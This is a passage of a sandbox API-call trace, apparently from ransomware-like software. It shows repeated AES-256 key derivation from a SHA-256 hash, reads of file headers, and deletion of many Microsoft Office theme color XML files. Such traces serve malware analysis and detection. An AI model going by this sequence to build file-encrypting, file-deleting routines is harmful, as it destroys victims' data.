CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.235] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.235] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.235] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0159.235] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.237] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.237] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.237] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml")) returned 1 [0159.239] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.240] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.240] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.240] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.240] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39e [0159.240] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.242] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.242] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.242] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml")) returned 1 [0159.244] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.245] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.245] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.245] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.245] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0159.245] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.247] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.247] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.247] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.248] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml")) returned 1 [0159.249] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.249] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.249] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.249] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.249] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0159.249] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.266] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.266] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.266] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml")) returned 1 [0159.268] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.269] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.269] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.269] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.269] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0159.269] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.271] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.271] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.271] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml")) returned 1 [0159.273] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.274] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.274] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.274] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.274] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0159.274] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.279] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.279] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.279] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml")) returned 1 [0159.281] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.281] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.281] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.281] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.281] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0159.282] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.283] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.283] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.283] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml")) returned 1 [0159.286] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.286] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.286] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.286] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.286] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0159.286] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.288] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.288] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.288] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.289] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml")) returned 1 [0159.291] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.292] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.292] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.292] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.292] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0159.292] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.304] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.304] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.304] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.305] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml")) returned 1 [0159.306] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.307] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.307] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.307] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.307] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0159.307] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.319] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.319] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.319] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml")) returned 1 [0159.321] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.321] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.321] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.321] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.321] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c6 [0159.321] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.332] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.332] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.332] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml")) returned 1 [0159.335] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.335] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.335] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.335] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.335] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0159.335] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.341] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.341] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.341] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml")) returned 1 [0159.343] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.344] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.344] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.344] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.344] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c5 [0159.344] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.346] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.346] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.346] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml")) returned 1 [0159.348] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.348] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.348] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.348] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.348] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c3 [0159.348] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.353] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.353] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.353] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml")) returned 1 [0159.356] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.356] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.356] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.356] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.356] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0159.356] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.364] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.364] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.364] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.365] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml")) returned 1 [0159.366] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.367] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.367] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.367] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.367] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0159.367] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.377] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.377] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.377] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml")) returned 1 [0159.379] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.380] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.380] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.380] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.380] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3bf [0159.380] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.391] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.391] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.392] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.393] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml")) returned 1 [0159.394] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.394] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.394] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.394] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.394] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0159.394] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.409] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.409] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.409] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml")) returned 1 [0159.412] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.413] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.413] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.413] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.413] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0159.413] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.438] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.438] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.438] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.439] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml")) returned 1 [0159.440] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.440] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.441] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 